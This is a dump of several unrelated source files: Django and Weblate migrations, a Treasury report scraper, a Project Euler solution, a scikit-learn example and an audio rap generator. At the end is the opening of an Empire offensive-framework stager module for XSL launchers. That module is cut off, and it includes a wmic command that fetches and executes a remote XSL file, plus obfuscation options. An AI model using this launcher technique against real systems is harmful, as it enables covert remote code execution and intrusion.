{'max_length': '100'}), 'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}) }, u'auth.user': { 'Meta': {'object_name': 'User'}, 'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}), 'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}), 'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}), 'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}), 'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}), 'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}), 'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}), 'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'}) }, u'contenttypes.contenttype': { 'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"}, 'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}) }, u'songs.album': { 'Meta': {'object_name': 'Album'}, 'api_id': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '100', 'null': 'True', 'blank': 'True'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}), 'slug': ('django_extensions.db.fields.AutoSlugField', [], {'allow_duplicates': 'False', 'max_length': '50', 'separator': "u'-'", 'blank': 'True', 'populate_from': "'name'", 'overwrite': 'False'}) }, u'songs.artist': { 'Meta': {'object_name': 'Artist'}, 'api_id': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '100', 'null': 'True', 'blank': 'True'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}), 'slug': ('django_extensions.db.fields.AutoSlugField', [], {'allow_duplicates': 'False', 'max_length': '50', 'separator': "u'-'", 'blank': 'True', 'populate_from': "'name'", 'overwrite': 'False'}) }, u'songs.interpretation': { 'Meta': {'object_name': 'Interpretation'}, 'created_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}), 'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'last_update': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}), 'song': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['songs.Song']"}), 'songsterr_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}), 'soundcloud_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}), 'uuid': ('django.db.models.fields.CharField', [], {'max_length': '36', 'blank': 'True'}), 'youtube_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}) }, u'songs.song': { 'Meta': {'object_name': 'Song'}, 'album': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['songs.Album']"}), 'api_id': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '100', 'null': 'True', 'blank': 'True'}), 'artist': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['songs.Artist']"}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}), 'slug': ('django_extensions.db.fields.AutoSlugField', [], {'allow_duplicates': 'False', 'max_length': '50', 'separator': "u'-'", 'blank': 'True', 'populate_from': "'name'", 'overwrite': 'False'}), 'tinysong_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}) } } complete_apps = ['songs'] symmetrical = True
apache-2.0
-7,906,301,131,644,745,000
69.142857
208
0.53055
false
3.739172
false
false
false
dontnod/weblate
weblate/trans/migrations/0021_auto_20190321_1004.py
1
3976
# -*- coding: utf-8 -*- # Generated by Django 1.11.17 on 2019-03-21 10:04 from __future__ import unicode_literals import django.db.models.deletion from django.db import migrations, models class Migration(migrations.Migration): dependencies = [("trans", "0020_auto_20190321_0921")] operations = [ migrations.AddField( model_name="change", name="alert", field=models.ForeignKey( null=True, on_delete=django.db.models.deletion.SET_NULL, to="trans.Alert", ), ), migrations.AddField( model_name="change", name="whiteboard", field=models.ForeignKey( null=True, on_delete=django.db.models.deletion.SET_NULL, to="trans.WhiteboardMessage", ), ), migrations.AlterField( model_name="change", name="action", field=models.IntegerField( choices=[ (0, "Resource update"), (1, "Translation completed"), (2, "Translation changed"), (5, "New translation"), (3, "Comment added"), (4, "Suggestion added"), (6, "Automatic translation"), (7, "Suggestion accepted"), (8, "Translation reverted"), (9, "Translation uploaded"), (10, "Glossary added"), (11, "Glossary updated"), (12, "Glossary uploaded"), (13, "New source string"), (14, "Component locked"), (15, "Component unlocked"), (16, "Found duplicated string"), (17, "Committed changes"), (18, "Pushed changes"), (19, "Reset repository"), (20, "Merged repository"), (21, "Rebased repository"), (22, "Failed merge on repository"), (23, "Failed rebase on repository"), (28, "Failed push on repository"), (24, "Parse error"), (25, "Removed translation"), (26, "Suggestion removed"), (27, "Search and replace"), (29, "Suggestion removed during cleanup"), (30, "Source string changed"), (31, "New string added"), (32, "Bulk status change"), (33, "Changed visibility"), (34, "Added user"), (35, "Removed user"), (36, "Translation approved"), (37, "Marked for edit"), (38, "Removed component"), (39, "Removed project"), (40, "Found duplicated language"), (41, "Renamed project"), (42, "Renamed component"), (43, "Moved component"), (44, "New string to translate"), (45, "New contributor"), (46, "New whiteboard message"), (47, "New component alert"), ], default=2, ), ), migrations.AlterField( model_name="change", name="comment", field=models.ForeignKey( null=True, on_delete=django.db.models.deletion.SET_NULL, to="trans.Comment", ), ), migrations.AlterField( model_name="change", name="suggestion", field=models.ForeignKey( null=True, on_delete=django.db.models.deletion.SET_NULL, to="trans.Suggestion", ), ), ]
gpl-3.0
-1,935,226,728,235,325,400
36.158879
62
0.429326
false
5.026549
false
false
false
lukerosiak/inspectors-general
inspectors/treasury.py
2
15149
#!/usr/bin/env python import datetime import logging import os import re from urllib.parse import urljoin, unquote from utils import utils, inspector, admin # https://www.treasury.gov/about/organizational-structure/ig/Pages/audit_reports_index.aspx archive = 2005 # options: # standard since/year options for a year range to fetch from. # # Notes for IG's web team: # - Add an agency for report 'OIG-09-015' listed on # https://www.treasury.gov/about/organizational-structure/ig/Pages/by-date-2009.aspx # - There is an extra tr.ms-rteTableEvenRow-default at the end of # https://www.treasury.gov/about/organizational-structure/ig/Pages/by-date-2014.aspx # - Add published dates for all reports at # https://www.treasury.gov/about/organizational-structure/ig/Pages/other-reports.aspx # - OIG-07-003 is posted twice, once with the wrong date AUDIT_REPORTS_BASE_URL = "https://www.treasury.gov/about/organizational-structure/ig/Pages/by-date-{}.aspx" TESTIMONIES_URL = "https://www.treasury.gov/about/organizational-structure/ig/Pages/testimony_index.aspx" PEER_AUDITS_URL = "https://www.treasury.gov/about/organizational-structure/ig/Pages/peer_audit_reports_index.aspx" OTHER_REPORTS_URL = "https://www.treasury.gov/about/organizational-structure/ig/Pages/other-reports.aspx" SEMIANNUAL_REPORTS_URL = "https://www.treasury.gov/about/organizational-structure/ig/Pages/semiannual_reports_index.aspx" AGENCY_NAMES = { "bep": "The Bureau of Engraving & Printing", "bfs": "The Bureau of the Fiscal Service", "bpd": "The Bureau of the Public", "cdfi": "The Community Development Financial Institution Fund", "cfpb": "Consumer Financial Protection Bureau", "do": "Department of the Treasury", "esf": "Exchange Stabilization Fund", "ffb": "Federal Financing Bank", "fcen": "The Financial Crimes Enforcement Network", "fincen": "The Financial Crimes Enforcement Network", # Another slug for the above "fms": "Financial Management Service", "gcerc": "Gulf Coast Ecosystem Restoration Council", "ia": "The Office of International Affairs", "mint": "The U.S. Mint", "occ": "The Office of the Comptroller of the Currency", "odcp": "Office of DC Pensions", "ofac": "The Office of Foreign Assets Control", "ofr": "Office of Financial Research", "oig": "Office of the Inspector General", "ots": "The Office of Thrift", "restore": "The RESTORE Act", "sblf": "Small Business Lending Fund", "ssbci": "State Small Business Credit Initiative", "tfi": "Office of Terrorism and Financial Intelligence", "ttb": "The Alcohol and Tobacco Tax and Trade Bureau", "tff": "Treasury Forfeiture Fund", } OTHER_URLS = { "testimony": TESTIMONIES_URL, "peer_review": PEER_AUDITS_URL, "other": OTHER_REPORTS_URL, } UNRELEASED_REPORTS = [ # These reports do not say they are unreleased, but there are no links "IGATI 2006", "IGATI 2007", "OIG-CA-07-001", "OIG-08-039", "OIG-08-013", ] REPORT_AGENCY_MAP = { "OIG-09-015": "mint", # See note to IG web team } REPORT_PUBLISHED_MAP = { "OIG-CA-13-006": datetime.datetime(2013, 3, 29), "OIG-13-CA-008": datetime.datetime(2013, 6, 10), "Treasury Freedom of Information Act (FOIA) Request Review": datetime.datetime(2010, 11, 19), "OIG-CA-14-017": datetime.datetime(2014, 9, 30), "OIG-CA-14-015": datetime.datetime(2014, 9, 4), "OIG-CA-15-023": datetime.datetime(2015, 7, 29), "OIG-CA-15-020": datetime.datetime(2015, 6, 22), "OIG-15-CA-012": datetime.datetime(2015, 4, 7), "OIG-CA-15-024": datetime.datetime(2015, 9, 15), "M-12-12 Reporting": datetime.datetime(2016, 1, 28), "OIG-CA-16-012": datetime.datetime(2016, 3, 30), "OIG-CA-16-014": datetime.datetime(2016, 4, 19), "Role of Non-Career Officials in Treasury FOIA Processing": datetime.datetime(2016, 3, 9), "OIG-CA-16-028": datetime.datetime(2016, 6, 30), "OIG-CA-16-033A": datetime.datetime(2016, 7, 29), "OIG-CA-16-033B": datetime.datetime(2016, 7, 29), "OIG-CA-17-006": datetime.datetime(2016, 11, 10), "OIG-CA-17-009": datetime.datetime(2017, 1, 27), "OIG-CA-17-010": datetime.datetime(2017, 1, 27), "OIG-CA-17-012": datetime.datetime(2017, 2, 27), "OIG-CA-17-013": datetime.datetime(2017, 3, 1), } def run(options): year_range = inspector.year_range(options, archive) if datetime.datetime.now().month >= 10: # October, November, and December fall into the next fiscal year # Add next year to year_range to compensate year_range.append(max(year_range) + 1) # Pull the audit reports for year in year_range: if year < 2006: # This is the oldest year for these reports continue url = AUDIT_REPORTS_BASE_URL.format(year) doc = utils.beautifulsoup_from_url(url) results = doc.find_all("tr", class_=["ms-rteTableOddRow-default", "ms-rteTableEvenRow-default"]) if not results: if year != datetime.datetime.now().year + 1: raise inspector.NoReportsFoundError("Treasury (%d)" % year) for result in results: report = audit_report_from(result, url, year_range) if report: inspector.save_report(report) for report_type, url in OTHER_URLS.items(): doc = utils.beautifulsoup_from_url(url) results = doc.select("#ctl00_PlaceHolderMain_ctl05_ctl01__ControlWrapper_RichHtmlField > p a") if not results: raise inspector.NoReportsFoundError("Treasury (%s)" % report_type) for result in results: if len(result.parent.find_all("a")) == 1: result = result.parent report = report_from(result, url, report_type, year_range) if report: inspector.save_report(report) doc = utils.beautifulsoup_from_url(SEMIANNUAL_REPORTS_URL) results = doc.select("#ctl00_PlaceHolderMain_ctl05_ctl01__ControlWrapper_RichHtmlField > p > a") if not results: raise inspector.NoReportsFoundError("Treasury (semiannual reports)") for result in results: report = semiannual_report_from(result, SEMIANNUAL_REPORTS_URL, year_range) if report: inspector.save_report(report) def clean_text(text): # A lot of text on this page has extra characters return text.replace('\u200b', '').replace('\ufffd', ' ').replace('\xa0', ' ').strip() SUMMARY_RE = re.compile("(OIG|OIG-CA|EVAL) *-? *([0-9]+) *- *([0-9R]+) *[:,]? +([^ ].*)") SUMMARY_FALLBACK_RE = re.compile("([0-9]+)-(OIG)-([0-9]+) *:? *(.*)") FILENAME_RE = re.compile("^(OIG-[0-9]+-[0-9]+)\\.pdf") def audit_report_from(result, page_url, year_range): if not clean_text(result.text): # Empty row return # Get all direct child nodes children = list(result.find_all(True, recursive=False)) published_on_text = clean_text(children[1].text) # this is the header row if published_on_text.strip() == "Date": return None date_formats = ['%m/%d/%Y', '%m/%d%Y'] published_on = None for date_format in date_formats: try: published_on = datetime.datetime.strptime(published_on_text, date_format) except ValueError: pass report_summary = clean_text(children[2].text) if not report_summary: # There is an extra row that we want to skip return report_summary = report_summary.replace("OIG-15-38Administrative", "OIG-15-38 Administrative") summary_match = SUMMARY_RE.match(report_summary) summary_match_2 = SUMMARY_FALLBACK_RE.match(report_summary) if summary_match: report_id = summary_match.expand(r"\1-\2-\3") title = summary_match.group(4) elif summary_match_2: report_id = summary_match_2.expand(r"(\2-\1-\3") title = summary_match_2.group(4) elif report_summary.startswith("IGATI") and published_on is not None: # There are two such annual reports from different years, append the year report_id = "IGATI %d" % published_on.year title = report_summary elif report_summary == "Report on the Bureau of the Fiscal Service Federal " \ "Investments Branch\u2019s Description of its Investment/" \ "Redemption Services and the Suitability of the Design and Operating " \ "Effectiveness of its Controls for the Period August 1, 2013 to " \ "July 31, 2014": # This one is missing its ID in the index report_id = "OIG-14-049" title = report_summary elif report_summary == "Correspondence related to the resolution of audit recommendation 1 OIG-16-001 OFAC Libyan Sanctions Case Study (Please read this correspondence in conjunction with the report.)": # Need to make up a report_id for this supplemental document report_id = "OIG-16-001-resolution" title = report_summary else: try: filename_match = FILENAME_RE.match(os.path.basename(result.a["href"])) report_id = filename_match.group(1) title = report_summary except (ValueError, IndexError, AttributeError): raise Exception("Couldn't parse report ID: %s" % repr(report_summary)) if report_id == 'OIG-15-015' and \ 'Financial Statements for hte Fiscal Years 2014 and 2013' in title: # This report is listed twice, once with a typo return if report_id == 'OIG-07-003' and published_on_text == '11/23/2006': # This report is listed twice, once with the wrong date return # There are copy-paste errors with several retracted reports if report_id == 'OIG-14-037': if published_on.year == 2011 or published_on.year == 2010: return if report_id == 'OIG-13-021' and published_on_text == '12/12/2012': return if published_on is None: admin.log_no_date("treasury", report_id, title) return agency_slug_text = children[0].text if report_id in REPORT_AGENCY_MAP: agency_slug = REPORT_AGENCY_MAP[report_id] else: agency_slug = clean_text(agency_slug_text.split("&")[0]).lower() if (report_id in UNRELEASED_REPORTS or "If you would like a copy of this report" in report_summary or "If you would like to see a copy of this report" in report_summary or "have been removed from the OIG website" in report_summary or "removed the auditors\u2019 reports from the" in report_summary or "Classified Report" in report_summary or "Classified Audit Report" in report_summary or "Sensitive But Unclassified" in report_summary or "To obtain further information, please contact the OIG" in report_summary): unreleased = True report_url = None landing_url = page_url else: link = result.select("a")[0] report_url = urljoin(AUDIT_REPORTS_BASE_URL, link['href']) if report_url == AUDIT_REPORTS_BASE_URL: raise Exception("Invalid link found: %s" % link) unreleased = False landing_url = None # HTTPS, even if they haven't updated their links yet if report_url is not None: report_url = re.sub("^http://www.treasury.gov", "https://www.treasury.gov", report_url) if report_url == "https://www.treasury.gov/about/organizational-structure/ig/Documents/OIG-11-071.pdf": report_url = "https://www.treasury.gov/about/organizational-structure/ig/Documents/OIG11071.pdf" if published_on.year not in year_range: logging.debug("[%s] Skipping, not in requested range." % report_url) return report = { 'inspector': 'treasury', 'inspector_url': 'https://www.treasury.gov/about/organizational-structure/ig/', 'agency': agency_slug, 'agency_name': AGENCY_NAMES[agency_slug], 'type': 'audit', 'report_id': report_id, 'url': report_url, 'title': title, 'published_on': datetime.datetime.strftime(published_on, "%Y-%m-%d"), } if unreleased: report['unreleased'] = unreleased if landing_url: report['landing_url'] = landing_url return report def report_from(result, page_url, report_type, year_range): try: title, date1, date2 = result.text.rsplit(",", 2) published_on_text = date1 + date2 published_on = datetime.datetime.strptime(published_on_text.strip(), '%B %d %Y') except ValueError: try: title, date1, date2, date3 = result.text.rsplit(maxsplit=3) published_on_text = date1 + date2 + date3 published_on = datetime.datetime.strptime(published_on_text.strip(), '%B%d,%Y') except ValueError: title = result.text published_on = None title = clean_text(title) original_title = title report_id, title = title.split(maxsplit=1) report_id = report_id.rstrip(":") if result.name == "a": link = result else: link = result.a report_url = urljoin(page_url, link['href']) # HTTPS, even if they haven't updated their links yet report_url = re.sub("^http://www.treasury.gov", "https://www.treasury.gov", report_url) if report_id.find('-') == -1: # If the first word of the text doesn't contain a hyphen, # then it's probably part of the title, and not a tracking number. # In this case, fall back to the URL. report_filename = report_url.split("/")[-1] report_id, extension = os.path.splitext(report_filename) report_id = unquote(report_id) # Reset the title, since we previously stripped off the first word # as a candidate report_id. title = original_title if report_id in REPORT_PUBLISHED_MAP: published_on = REPORT_PUBLISHED_MAP[report_id] if not published_on: admin.log_no_date("treasury", report_id, title, report_url) return # Skip this report, it already shows up under other audit reports if report_id == "Role of Non-Career Officials in Treasury FOIA Processing": return if published_on.year not in year_range: logging.debug("[%s] Skipping, not in requested range." % report_url) return report = { 'inspector': 'treasury', 'inspector_url': 'https://www.treasury.gov/about/organizational-structure/ig/', 'agency': 'treasury', 'agency_name': "Department of the Treasury", 'type': report_type, 'report_id': report_id, 'url': report_url, 'title': title, 'published_on': datetime.datetime.strftime(published_on, "%Y-%m-%d"), } return report def semiannual_report_from(result, page_url, year_range): published_on_text = clean_text(result.text) published_on = datetime.datetime.strptime(published_on_text.strip(), '%B %d, %Y') title = "Semiannual Report - {}".format(published_on_text) report_url = urljoin(page_url, result['href']) # HTTPS, even if they haven't updated their links yet report_url = re.sub("^http://www.treasury.gov", "https://www.treasury.gov", report_url) report_filename = report_url.split("/")[-1] report_id, extension = os.path.splitext(report_filename) report_id = unquote(report_id) if published_on.year not in year_range: logging.debug("[%s] Skipping, not in requested range." % report_url) return report = { 'inspector': 'treasury', 'inspector_url': 'https://www.treasury.gov/about/organizational-structure/ig/', 'agency': 'treasury', 'agency_name': "Department of the Treasury", 'type': 'semiannual_report', 'report_id': report_id, 'url': report_url, 'title': title, 'published_on': datetime.datetime.strftime(published_on, "%Y-%m-%d"), } return report utils.run(run) if (__name__ == "__main__") else None
cc0-1.0
3,522,391,499,883,024,000
37.255051
204
0.676678
false
3.169247
false
false
false
Igglyboo/Project-Euler
1-99/30-39/Problem35.py
1
1086
from time import clock def timer(function): def wrapper(*args, **kwargs): start = clock() print(function(*args, **kwargs)) print("Solution took: %f seconds." % (clock() - start)) return wrapper @timer def find_answer(): total = 0 primes = sieve(1000000) primes.remove(0) for prime in primes: p_str = list(str(prime)) p_str.append(p_str.pop(0)) for i in range(len(p_str) - 1): current = int(''.join(x for x in p_str)) if current not in primes: break p_str.append(p_str.pop(0)) else: total += 1 return total def sieve(upperlimit): l = list(range(2, upperlimit + 1)) # Do p = 2 first so we can change step size to 2*p below for i in range(4, upperlimit + 1, 2): l[i - 2] = 0 for p in l: if p ** 2 > upperlimit: break elif p: for i in range(p * p, upperlimit + 1, 2 * p): l[i - 2] = 0 return set(l) if __name__ == "__main__": find_answer()
unlicense
2,629,917,463,131,232,000
20.294118
63
0.503683
false
3.372671
false
false
false
karstenw/nodebox-pyobjc
examples/Extended Application/sklearn/examples/ensemble/plot_ensemble_oob.py
1
4073
""" ============================= OOB Errors for Random Forests ============================= The ``RandomForestClassifier`` is trained using *bootstrap aggregation*, where each new tree is fit from a bootstrap sample of the training observations :math:`z_i = (x_i, y_i)`. The *out-of-bag* (OOB) error is the average error for each :math:`z_i` calculated using predictions from the trees that do not contain :math:`z_i` in their respective bootstrap sample. This allows the ``RandomForestClassifier`` to be fit and validated whilst being trained [1]. The example below demonstrates how the OOB error can be measured at the addition of each new tree during training. The resulting plot allows a practitioner to approximate a suitable value of ``n_estimators`` at which the error stabilizes. .. [1] T. Hastie, R. Tibshirani and J. Friedman, "Elements of Statistical Learning Ed. 2", p592-593, Springer, 2009. """ import matplotlib.pyplot as plt from collections import OrderedDict from sklearn.datasets import make_classification from sklearn.ensemble import RandomForestClassifier, ExtraTreesClassifier # Author: Kian Ho <hui.kian.ho@gmail.com> # Gilles Louppe <g.louppe@gmail.com> # Andreas Mueller <amueller@ais.uni-bonn.de> # # License: BSD 3 Clause # nodebox section if __name__ == '__builtin__': # were in nodebox import os import tempfile W = 800 inset = 20 size(W, 600) plt.cla() plt.clf() plt.close('all') def tempimage(): fob = tempfile.NamedTemporaryFile(mode='w+b', suffix='.png', delete=False) fname = fob.name fob.close() return fname imgx = 20 imgy = 0 def pltshow(plt, dpi=150): global imgx, imgy temppath = tempimage() plt.savefig(temppath, dpi=dpi) dx,dy = imagesize(temppath) w = min(W,dx) image(temppath,imgx,imgy,width=w) imgy = imgy + dy + 20 os.remove(temppath) size(W, HEIGHT+dy+40) else: def pltshow(mplpyplot): mplpyplot.show() # nodebox section end print(__doc__) RANDOM_STATE = 123 # Generate a binary classification dataset. X, y = make_classification(n_samples=500, n_features=25, n_clusters_per_class=1, n_informative=15, random_state=RANDOM_STATE) # NOTE: Setting the `warm_start` construction parameter to `True` disables # support for parallelized ensembles but is necessary for tracking the OOB # error trajectory during training. ensemble_clfs = [ ("RandomForestClassifier, max_features='sqrt'", RandomForestClassifier(warm_start=True, oob_score=True, max_features="sqrt", random_state=RANDOM_STATE)), ("RandomForestClassifier, max_features='log2'", RandomForestClassifier(warm_start=True, max_features='log2', oob_score=True, random_state=RANDOM_STATE)), ("RandomForestClassifier, max_features=None", RandomForestClassifier(warm_start=True, max_features=None, oob_score=True, random_state=RANDOM_STATE)) ] # Map a classifier name to a list of (<n_estimators>, <error rate>) pairs. error_rate = OrderedDict((label, []) for label, _ in ensemble_clfs) # Range of `n_estimators` values to explore. min_estimators = 15 max_estimators = 175 for label, clf in ensemble_clfs: for i in range(min_estimators, max_estimators + 1): clf.set_params(n_estimators=i) clf.fit(X, y) # Record the OOB error for each `n_estimators=i` setting. oob_error = 1 - clf.oob_score_ error_rate[label].append((i, oob_error)) # Generate the "OOB error rate" vs. "n_estimators" plot. for label, clf_err in error_rate.items(): xs, ys = zip(*clf_err) plt.plot(xs, ys, label=label) plt.xlim(min_estimators, max_estimators) plt.xlabel("n_estimators") plt.ylabel("OOB error rate") plt.legend(loc="upper right") # plt.show() pltshow(plt)
mit
7,607,601,848,409,383,000
32.385246
82
0.64056
false
3.569676
false
false
false
ruofengchen/mc-hawking
rap_gen.py
1
6438
import subprocess from numpy import * from scipy import * import wave import scipy.io.wavfile import scipy.signal import random import pylab import pdb '''By Ruofeng Chen, April 2013''' voices = ["Albert", "Bad News", "Bahh", "Bells", "Boing", "Bubbles", "Cellos", "Deranged", "Good News", "Hysterical", "Pipe Organ", "Trinoids", "Whisper", "Zarvox"] pulses = {} pulses[1] = [0] pulses[2] = [0, 4] pulses[3] = [0, 4, 8] pulses[4] = [12, 16, 20, 24] pulses[5] = [8, 12, 16, 20, 24] pulses[6] = [6, 8, 12, 16, 20, 24] pulses[7] = [6, 8, 10, 12, 22, 24, 28] pulses[8] = [6, 8, 10, 12, 22, 24, 26, 28] pulses[9] = [6, 8, 10, 12, 16, 20, 24, 26, 28] pulses[10] = [4, 6, 8, 10, 12, 16, 20, 24, 26, 28] pulses[11] = [4, 6, 8, 10, 12, 16, 18, 20, 24, 26, 28] pulses[12] = [4, 6, 8, 10, 12, 16, 18, 20, 22, 24, 26, 28] pulses[13] = [2, 4, 6, 8, 10, 12, 16, 18, 20, 22, 24, 26, 28] pulses[14] = [0, 2, 4, 6, 8, 10, 12, 16, 18, 20, 22, 24, 26, 28] pulses[15] = [0, 2, 4, 6, 8, 10, 12, 14, 16, 18, 20, 22, 24, 26, 28] pulses[16] = [0, 2, 4, 6, 8, 10, 12, 14, 16, 18, 20, 22, 24, 26, 28, 30] # ratios = [1, 1.1, 1.2, 1.1, 1, 1.1, 1.2, 1.1, 1, 1.1, 1.2, 1.1, 1, 1.1, 1.2, 1.1] synth_path = "./synth" rap_path = "./rap" def time_stretch_half(dafxin): '''''' hopsize = 480 # sounds good using this parameter framesize = 2 * hopsize hannWin = hanning(framesize) framenum = dafxin.size / hopsize - 1 dafxout = zeros(hopsize*(framenum/2)+framesize) for n in range(framenum): if n % 2 == 0: dafxout[n/2*hopsize:n/2*hopsize+framesize] = dafxout[n/2*hopsize:n/2*hopsize+framesize] + dafxin[n*hopsize:n*hopsize+framesize] * hannWin return dafxout def synth(words, voice="Fred"): for word in words: fullcmd = ['say', '-v', voice, '-o', synth_path+'/'+str(hash(word))+'.wav', '--data-format=LEI16@44100', word] subprocess.check_output(fullcmd) def align_to_beats(everything): ''' YO YO ''' tempo = 140 intvl = 0.25 / (tempo / 60.) * 44100. total_len = 8 / (tempo / 60.) * 44100. data_list = [] for tup in everything: for i in range(len(tup[1])): data_list.append(tup[0][tup[1][i]:tup[2][i]]) fs, rapdata = scipy.io.wavfile.read(open('drum_1bar.wav', 'r')) rapdata = float32(rapdata / float(2**16)) rapdata = mean(rapdata, 1) rapdata = rapdata * 0.2 # rapdata = zeros(total_len * 1.5) # if you don't want accompaniment total_voice_len = sum([data.size for data in data_list]) syllable_num = len(data_list) if syllable_num > 16: syllable_num = 16 # this will result in overlapping words pulse = pulses[syllable_num] for s in range(syllable_num): start = pulse[s] * intvl if s < syllable_num - 1 and data_list[s].size > 1.5 * (pulse[s+1] - pulse[s]) * intvl: data_list[s] = time_stretch_half(data_list[s]) if s == 0: rapdata[start:start+data_list[s].size] = rapdata[start:start+data_list[s].size] + data_list[s] * 2. elif pulse[s] % 4 == 0: rapdata[start:start+data_list[s].size] = rapdata[start:start+data_list[s].size] + data_list[s] * 1.2 else: rapdata[start:start+data_list[s].size] = rapdata[start:start+data_list[s].size] + data_list[s] # pylab.plot(rapdata) # pylab.show() # delete the tailing zeros first_zero = rapdata.size-1 while rapdata[first_zero] == 0: first_zero = first_zero - 1 rapdata = rapdata[0:first_zero] # delete the heading few samples rapdata = rapdata[0.2*44100:-1] rapdata = rapdata / max(abs(rapdata)) * 0.4 rapdata = array(rapdata * float(2**16), dtype=int16) return rapdata def find_onsets_and_offsets(data): th = 0 hopsize = 512 framenum = data.size / hopsize # find all onsets energy0 = 0 onsets = [] offsets = [] for n in range(framenum): energy1 = sum(data[n*hopsize:(n+1)*hopsize] ** 2) / hopsize if energy0 <= th and energy1 > th: ind = n*hopsize onsets.append(ind) # from this onset on, find its corresponding offset n2 = n energy2 = energy1 while (n2+1)*hopsize <= data.size and energy2 > th: energy2 = sum(data[n2*hopsize:(n2+1)*hopsize] ** 2) / hopsize n2 = n2 + 1 if (n2+1)*hopsize > data.size: offsets.append(data.size-1) else: offsets.append(n2*hopsize) energy0 = energy1 if len(onsets) != len(offsets): print "Big problem!!! Onsets != Offsets" # for all words that are too short, merge them with the shorter neighbor if len(onsets) > 1: while True: short_count = 0 for i in range(len(onsets)): if offsets[i] - onsets[i] < 44100 * 0.2: short_count = short_count + 1 if short_count == 0: break for i in range(len(onsets)): if offsets[i] - onsets[i] < 44100 * 0.2: if i >= 1 and i <= len(onsets)-2: if offsets[i-1] - onsets[i-1] < offsets[i+1] - onsets[i+1]: onsets.pop(i) offsets.pop(i-1) else: onsets.pop(i+1) offsets.pop(i) elif i == 0: onsets.pop(i+1) offsets.pop(i) else: onsets.pop(i) offsets.pop(i-1) break return array(onsets, int), array(offsets, int) def from_text_to_wavfile(sentence): words = sentence.split(" ") synth(words) everything = [] for word in words: fs, data = scipy.io.wavfile.read(open(synth_path+'/'+str(hash(word))+'.wav', 'r')) data = float32(data / float(2**16)) if fs != 44100: print "warning: fs is not 44100!!!!!!" onsets, offsets = find_onsets_and_offsets(data) everything.append((data, onsets, offsets)) rapdata = align_to_beats(everything) scipy.io.wavfile.write(rap_path+'/'+str(hash(sentence))+'-rap.wav', 44100, rapdata) if __name__ == '__main__': # generate the audio sentence = '''thank you so much for coming tonight''' from_text_to_wavfile(sentence)
gpl-2.0
5,563,728,229,412,827,000
34.373626
164
0.540385
false
2.82989
false
false
false
Hackplayers/Empire-mod-Hackplayers
lib/stagers/windows/starfighters_xsl.py
1
61839
from lib.common import helpers from termcolor import colored class Stager: def __init__(self, mainMenu, params=[]): self.info = { 'Name': 'XSL Launcher StarFighter', 'Author': ['@CyberVaca'], 'Description': ('Generates a .xsl launcher for Empire.'), 'Comments': [ 'wmic process get brief /format:"http://10.10.10.10/launcher.xsl"' ] } # any options needed by the stager, settable during runtime self.options = { # format: # value_name : {description, required, default_value} 'Listener': { 'Description': 'Listener to generate stager for.', 'Required': True, 'Value': '' }, 'Language' : { 'Description' : 'Language of the stager to generate.', 'Required' : True, 'Value' : 'powershell' }, 'StagerRetries': { 'Description': 'Times for the stager to retry connecting.', 'Required': False, 'Value': '0' }, 'Base64' : { 'Description' : 'Switch. Base64 encode the output.', 'Required' : True, 'Value' : 'True' }, 'Obfuscate' : { 'Description' : 'Switch. Obfuscate the launcher powershell code, uses the ObfuscateCommand for obfuscation types. For powershell only.', 'Required' : False, 'Value' : 'False' }, 'ObfuscateCommand' : { 'Description' : 'The Invoke-Obfuscation command to use. Only used if Obfuscate switch is True. For powershell only.', 'Required' : False, 'Value' : r'Token\All\1,Launcher\STDIN++\12467' }, 'OutFile': { 'Description': 'File to output XSL to, otherwise displayed on the screen.', 'Required': False, 'Value': 